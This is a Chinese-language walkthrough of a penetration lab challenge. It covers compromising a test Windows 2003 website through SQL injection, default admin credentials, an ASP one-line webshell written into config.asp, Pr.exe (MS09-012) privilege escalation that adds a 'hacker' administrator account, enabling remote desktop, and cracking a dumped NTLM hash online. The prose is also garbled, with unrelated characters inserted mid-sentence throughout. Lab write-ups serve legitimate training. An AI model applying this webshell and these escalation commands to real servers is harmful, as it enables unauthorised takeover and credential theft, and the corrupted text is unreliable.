本文來源:
01-在線挑戰(zhàn)詳細攻略-《我很簡單旭寿,請不要欺負我》
系列文章:
02-在線挑戰(zhàn)詳細攻略-《網(wǎng)站綜合滲透實驗》
03-在線挑戰(zhàn)詳細攻略-《又見DZ暴浦,我能拿你怎么辦》
04-在線挑戰(zhàn)詳細攻略-《2015中國網(wǎng)絡安全大賽:Reinstall真題》
05-在線挑戰(zhàn)詳細攻略-《2015中國網(wǎng)絡安全大賽:框架漏洞真題》
Setp 0
實驗環(huán)境
實驗地址:bbs.ichunqiu.com/thread-1783-1-1.html
操作機:Windows XP [172.16.11.2]
目標機:Windows server 2003 [172.16.12.2]
實驗工具: 中國菜刀 Pr 御劍 Pangolin 3389
本實驗要求獲取www.test.ichunqiu網(wǎng)站的服務器權限溅话。
ps:圖片可單擊放大觀看。
Step 1
目錄掃描
工具:御劍
路徑:C:\Tools\目錄掃描\
打開御劍歌焦,在域名中輸入http://www.test.ichunqiu飞几,開始掃描;
Step 2
工具:旁注WEB綜合檢測程序Ver3.6修正版
路徑:C:\Tools\注入工具\Domain3.6\Domain3.6.exe
注入點分析完畢后程腹,會在下方列表中顯示可注入的地址,選擇其中一個地址儒拂,右鍵選擇 [檢測注入]寸潦;
注入的方法與工具很多苗分,或者也可以這樣:在瀏覽器中打開網(wǎng)站首頁http://www.test.ichunqiu厌蔽,在最新產(chǎn)品中隨便選擇一個打開 [注入點太多];
工具:[穿山甲Pangolin]
路徑: C:\Tools\注入工具\pangolin
Pangolin是一款幫助滲透測試人員進行Sql注入測試的安全工具奴饮。所謂的SQL注入測試就是通過利用目標網(wǎng)站的某個頁面缺少對用戶傳遞參數(shù)控制或者控制的不夠好的情況下出現(xiàn)的漏洞,從而達到獲取择浊、修改戴卜、刪除數(shù)據(jù),甚至控制數(shù)據(jù)庫服務器琢岩、Web服務器的目的的測試方法投剥;
同樣能獲取用戶名和密碼拌消;
Setp 3
打開后臺登錄頁面,輸入用戶名admin氓英,密碼admin888侯勉,輸入驗證碼,點擊 [ENTER] 登錄后臺铝阐;
寫一句話木馬的時候注意閉合芳誓;
工具:中國菜刀? ? 路徑:C:\Tools\webshell\中國菜刀
在地址欄中輸入http://www.test.ichunqiu/inc/config.asp钟些,為什么是這個路徑烟号?因為我們剛才修改的網(wǎng)站信息配置頁面,就是這個路徑政恍,可以自己下載一個魅力企業(yè)網(wǎng)站管理系統(tǒng)源碼看看汪拥,2007或2009版的都行,里面的目錄結構一目了然篙耗;
連接密碼為#迫筑,密碼為什么是#? 往上看一句話木馬宗弯,里面有個chr(35)脯燃,#的ascii碼就是35,當然這個密碼可以隨便設置,只要保證服務端一句話木馬里的密碼和添加SHELL時輸入的密碼一致即可,點擊 [添加]由驹;
<code>
<%
Const SiteName="魅力企業(yè)網(wǎng)站管理系統(tǒng) 2007 中英繁商業(yè)正式版"? ?? ???'網(wǎng)站名稱
Const EnSiteName="MSCOM 2007"? ?? ???'網(wǎng)站名稱
Const SiteTitle="魅力軟件"? ?? ???'網(wǎng)站標題
Const EnSiteTitle="MelyySoft"? ?? ???'網(wǎng)站標題
Const SiteUrl="www.melyysoft.com"? ?? ???'網(wǎng)站地址
Const Miibeian="湘ICP備05011184號"? ?? ???'網(wǎng)站備案號
….
%>
</code>
構造一句話木馬:
<code>
"%><%Eval Request(Chr(35))%><%'
</code>
插入一句話木馬后懈糯,config.asp代碼會變成這樣:
<code>
<%
Const SiteName=""%><%Eval Request(Chr(35))%><% '"? ?? ???'網(wǎng)站名稱
Const EnSiteName="MSCOM 2007"? ?? ???'網(wǎng)站名稱
Const SiteTitle="魅力軟件"? ?? ???'網(wǎng)站標題
Const EnSiteTitle="MelyySoft"? ?? ???'網(wǎng)站標題
Const SiteUrl="www.melyysoft.com"? ?? ???'網(wǎng)站地址
Const Miibeian="湘ICP備05011184號"? ?? ???'網(wǎng)站備案號
….
%>
</code>
代碼再整理規(guī)范一點就是這樣:
<code>
<%Const SiteName=""%>
<%Eval Request(Chr(35))%>
<% '"? ?? ???'網(wǎng)站名稱
Const EnSiteName="MSCOM 2007"? ?? ???'網(wǎng)站名稱
Const SiteTitle="魅力軟件"? ?? ???'網(wǎng)站標題
Const EnSiteTitle="MelyySoft"? ?? ???'網(wǎng)站標題
Const SiteUrl="www.melyysoft.com"? ?? ???'網(wǎng)站地址
Const Miibeian="湘ICP備05011184號"? ?? ???'網(wǎng)站備案號
….
%>
</code>
所以插入一句話木馬一定要保證整個代碼的語法是正確的,否則肯定不成功单雾;
下一步赚哗,添加賬戶-->開啟3389-->遠程桌面連接-->獲取管理員賬戶密碼她紫;
Step 4
進入C:\RECYCLER目錄,準備上傳提權工具屿储;當然可寫的目錄不知這一個贿讹,還有其他的;
Pr.exe提權
Windows跟蹤注冊表項的ACL權限提升漏洞??KB952004??MS09-012
Windows管理規(guī)范(WMI)提供程序沒有正確地隔離NetworkService或LocalService帳號下運行的進程,同一帳號下運行的兩個獨立進程可以完全訪問對方的文件句柄相叁、注冊表項等資源遵绰。WMI提供程序主機進程在某些情況下會持有SYSTEM令牌,如果攻擊者可以以 NetworkService或LocalService帳號訪問計算機增淹,攻擊者就可以執(zhí)行代碼探索SYSTEM令牌的WMI提供程序主機進程椿访。一旦找到了SYSTEM令牌,就可以獲得SYSTEM權限的提升虑润。
使用方法:
<code>pr.exe "net user hacker 123 /add & net localgroup administrators hacker /add"</code>
net user hacker 123 /add
添加一個用戶名為hacker成玫、密碼為123的賬戶;
net localgroup administrators hacker /add
將賬戶hacker添加到管理員組端辱;
提權有很多種梁剔,如巴西烤肉Churrasco.exe等;
下一步舞蔽,執(zhí)行提權操作;
右鍵cmd.exe码撰,選擇 [虛擬終端]
<code>pr "net user hacker 123 /add"</code>
第一次執(zhí)行命令有可能不成功朵栖,怎么辦?
<code>pr "net localgroup administrators hacker /add"</code>
pr 3389
成功獲取到administrator的hash:62C4700EBB05958F3832C92FC614B7D1:4D478675344541AACCF6CF33E1DD9D85
暫時切換出實驗環(huán)境,在你的電腦上打開瀏覽器輸入http://www.objectif-securite.ch/en/ophcrack.php登渣,在頁面的相應位置輸入hash噪服,然后GO;